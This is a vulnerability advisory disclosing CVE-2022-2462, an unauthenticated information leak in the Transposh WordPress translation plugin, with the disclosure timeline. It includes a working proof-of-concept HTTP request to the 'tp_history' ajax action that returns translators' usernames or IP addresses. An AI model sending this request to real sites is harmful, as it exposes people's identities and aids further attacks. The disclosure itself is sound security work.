Get in touch

Transposh <= 1.0.8.1 “tp_history” Unauthenticated Information Disclosure

Jul 22, 2022 · By Julien Ahrens

ADVISORY INFORMATION

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

Transposh WordPress Translation 1.0.8.1 and below

INTRODUCTION

Transposh translation filter for WordPress offers a unique approach to blog translation. It allows your blog to combine automatic translation with human translation aided by your users with an easy to use in-context interface.

(from the vendor’s homepage)

VULNERABILITY DETAILS

Transposh offers an ajax action called “tp_history” which is intended to return data about who has translated a text given by the “token” parameter. However, the plugin also returns the user’s login name as part of the “user_login” attribute.

Successful exploits can allow an unauthenticated attacker to leak the WordPress username of translators. If an anonymous user submitted the translation, then the user’s IP address is returned.

PROOF OF CONCEPT

The following Proof-of-Concept returns the information of the translated text “Calendly URL”:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [host]
Content-Length: 36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0
Connection: close

action=tp_history&token=Calendly%20URL&lang=en

SOLUTION

None. Remove the plugin to prevent exploitation.

REPORT TIMELINE

  • 2022-07-13: Discovery of the vulnerability
  • 2022-07-13: CVE requested from WPScan (CNA)
  • 2022-07-18: No response from WPScan
  • 2022-07-18: CVE requested from Wordfence (CNA) instead
  • 2022-07-18: Sent note to vendor
  • 2022-07-18: Wordfence assigns CVE-2022-2462
  • 2022-07-20: Vendor states that there is no update planned so far
  • 2022-07-22: Public disclosure

REFERENCES

None